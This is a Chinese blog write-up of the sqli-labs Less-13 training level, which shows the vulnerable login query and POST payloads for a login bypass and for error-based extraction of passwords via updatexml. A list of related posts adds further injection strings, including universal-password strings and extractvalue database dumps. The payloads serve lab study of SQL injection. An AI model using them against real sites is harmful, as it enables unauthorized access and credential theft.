【Less-13】POST注入之报错注入

最新推荐文章于 2024-03-30 12:21:53 发布
最新推荐文章于 2024-03-30 12:21:53 发布
阅读量246 收藏
点赞数
分类专栏: SQL注入总结 文章标签: sql注入 mysql post注入 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109449965
版权

文章目录

一、测试注入点

源码:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

这关只有输入为真回显字母为蓝色,假为红色,也会报错,所以可以用报错和盲注。这里是用')来闭合

uname=admin') or '1'='1'#&passwd=admin&submit=Submit

在这里插入图片描述
这里使用报错注入,具体步骤查看:

https://blog.csdn.net/weixin_44032232/article/details/109314974

二、报错注入
uname=admin') and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#&passwd=123&submit=Submit

在这里插入图片描述

多学点技术
关注
专栏目录
22-4 SQL注入攻击 - post 基于报错的注入
weixin_43263566的博客
01-28 115
我们以 Sqli-Lab Less11 为例说明:http://192.168.0.103/sqlilabs/less-11/ (改成自己靶场所在主机的ip地址,不要用本地回环地址不然抓不到包) 正确账号是:admin/admin。这个关卡其实是可以用sql万能密码进行登录的,之前讲过,这里就不说了,这里就介绍一下在这个登录表单进行sql注入获取敏感信息。如果还不放心就可以用双引号,因为闭合符是单引号的话,我们用双引号页面就不会报错,这里可以自行选择是否测试。使用bp进行sql注入获取敏感信息。
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
luosaierdadi的博客
07-09 247
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sql注入——post,head,报错注入
qq_33441500的博客
10-15 320
sql注入——post,head,报错注入 一,POST注入 post注入高危点: 登录框 查询框 各类与数据库有交互框 经典的万能密码 'or 1=1# post注入跟get注入都差不多 那我们先判断先字段数 输入’order by 3# 联合查询 查询数据库名 post注入检测方式还有两种 1,使用sqlmap -u url --...
POST显错注入
m0_69676459的博客
05-06 132
单引号类型: 这时我们要选择方便的控件进行绕过: 非常简单! 双引号型: 本次的POST注入与上次的GET注入有何不同呢: 主要为:GET传参在URL里进行,POST传参在页面进行。 GET传参注入的时候要注意URL编码,POST传参注入不用考虑URL编码的变化,但POST传参要考虑在页面的哪个控件注入。 实验我们常用到的URL编码有%20(空格),%27(单引号),%29(空格)。 URL编码:URL编码是一种浏览器用来打包表单输入的格式。浏览器从表单获取所有的name和其
sql POST基于错误的注入
qq_41071646的博客
02-22 609
这里面 需要用到的工具是   Burp Suite  这款 优秀的抓包工具   然后还有sqlmap 等等   抓包的教程  有很多 这里就不一一叙述了  我们先来看一下 11这个关卡   然后 这里  可以直接输入 看返回结果 比如  也可以 截取 数据包  然后用     来发送    其呢   我们可以 通过报错信息来猜测闭合的信息    比如 我们输入了 是 a...
sqli-labs第十七关(post-报错注入
qq_42266432的博客
08-29 897
进入到十七关后发现这关有点不同,上面多了一行提示:密码重新设置,咱也不懂啥意思,在试了写常规注入方法后,没有发现什么可以利用的点,于是决定去看看代码,虽然我不会php 先看这一部分有sql语句的: 从users表搜索出uname和psw,条件和psw无关,只看uname mysql_fetch_array()好像能返回键值对,而且除了将数据以数字索引方式储存在数组之外,还可以将数据作为关联索引储存,用字段名作为键名。 uname正确的话,再将users表psw更新,条件等于刚刚输入的unam.
实验吧-web-加了料的报错注入(注释符/**/、post注入)
Sea_Sand息禅
03-17 459
页面提示,让post username和password,hackbar现在是越来越差劲了,直接用的bp。 报错注入来说,也有几个类型,不过这里我用的updatexml,经测试,extractvalue也是可以的。 首先,fuzz一下username和password: select、update这些都没有被过滤 而这些被过滤,系统识别是sql注入: 经测试,=是被SQL注...
sqli-labs学习笔记(四)less 11-14 post注入
闵行小鱼塘
09-07 524
继续学习sqli-labs,本篇是less11-14
sqli-labs学习笔记(七)less 18-22 header注入
闵行小鱼塘
09-12 402
继续学习sqli-labs,本篇是less18-22
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 744
所以先使用burp进行抓包,然后将数据包存入txt文件打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
1-7 POST基于错误的注入
LoveStarbucks的博客
12-29 373
1-7 POST基于错误的注入 1.Burpsuite抓取HTTP请求 (1)截断代理设置:在浏览器设置局域网代理。 安装该插件,或者可以直接设置代理 127.0.0.1 8080 (2)启动Burpsuite截取信息 首先看Burpsuite是否处于Run状态,如果不处于,则可能是端口冲突,需要修改端口,同时在浏览器设置的代理也需要修改端口。 1)开启截断 2).捕获到截取的信息 ...
post注入报错注入学习笔记
XiaoXiao_RenHe的专栏
04-24 2927
post注入报错注入学习笔记
MySQL|POST基于错误的注入
m_de_g的博客
11-30 1572
sql-labs()漏洞分析
SQL注入 1-3_基于post报错注入
weixin_44110913的博客
12-03 551
** SQL注入 1-3_基于post报错注入 ** 一.概念 客户端提交参数基于post 1.基于post注入不会拼接到url 2.相对get提交参数更加安全 3.但是依然可以使用代理(间人)截断判断是否存在sql注入 二.基于post报错的实列 1.打开登陆页面 按照常规的符号手段,观察以下三张图,并没有报错 当然也可以使用 id=1 and 1=2 和 id=1’ and ‘1’ =...
sqli-lab刷题Less-11,12,13,14基于报错的post注入
MichealCurry1的博客
10-09 120
在username输入1,在password输入1 显示登录错误,在username输入1,password输入1' 由此可以知道其为单引号型的post注入,在username输入1,password输入1' or 1=1 #登录成功 第十二关也是一样的思路 username输入1,password输入1") or 1=1 # 第十三关则是在username输入1,password输入1') or 1=1 # 第十四关则是在username输入1,passw
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 287
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
Sqli-labs 复习 Less13-14 报错型盲注 - POST
kevinhanser
08-11 408
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 报错型 SQL 盲注 函数讲解 盲注用到的函数 rand() 产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列 rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列 floor 向下取整 ...
sqli-labs-less-13 post传参+布尔盲注
yzcn
11-12 318
Less-13 post+布尔盲注 首先通过burp suite抓包获取报文体: 利用harkbar插件进行注入: 判断闭合方式: uname=’)or 1=1 #&passwd=&submit=Submit 发现闭合方式为(‘’) uname=’))#&passwd=&submit=Submit 本关卡没有回显,只有正误判断和报错信息,我们可以使用布尔盲注、延时注入或者报错注入,这里我么使用注入。 判断字段列数: uname=’) group by 3 #&
sql 注入的类型之 post 基于错误的注入(sqllib靶场less-11-12)(通过burpusite分析)
最新发布
weixin_74182283的博客
03-30 1303
post注入和get注入一样,都是基于数据库没有对语句进行足够多的过滤,导致用户可以直接在url上执行sql语句。这两基本上没区别,但是基于post注入在真实情况下会比get的多得多,最典型的post注入就是万能密码。
npm install less less-loader -D 安装less报错
05-09
如果你在安装 `less` 和 `less-loader` 时遇到了报错,可能是由于你的环境缺少依赖或者权限不足等原因导致的。 以下是一些可能的解决方案: 1. 确认你已经安装了 `node.js` 和 `npm`,并且版本都是最新的。 2. 检查你的网络是否正常,可以尝试使用其他镜像源进行安装,例如使用 `cnpm` 或者更换为其他源。 3. 确认你是否有足够的权限进行安装,可以尝试使用管理员权限运行命令行或者修改文件夹权限。 4. 如果你使用的是 Windows 系统,可能需要安装 Visual C++ Build Tools,可以通过这个链接下载并安装:https://visualstudio.microsoft.com/visual-cpp-build-tools/ 5. 如果你使用的是 MacOS 系统,可能需要安装 Xcode 命令行工具,在终端运行命令 `xcode-select --install` 即可安装。 如果以上解决方案无法解决问题,可以尝试搜索具体的报错信息或者在社区提问寻求帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值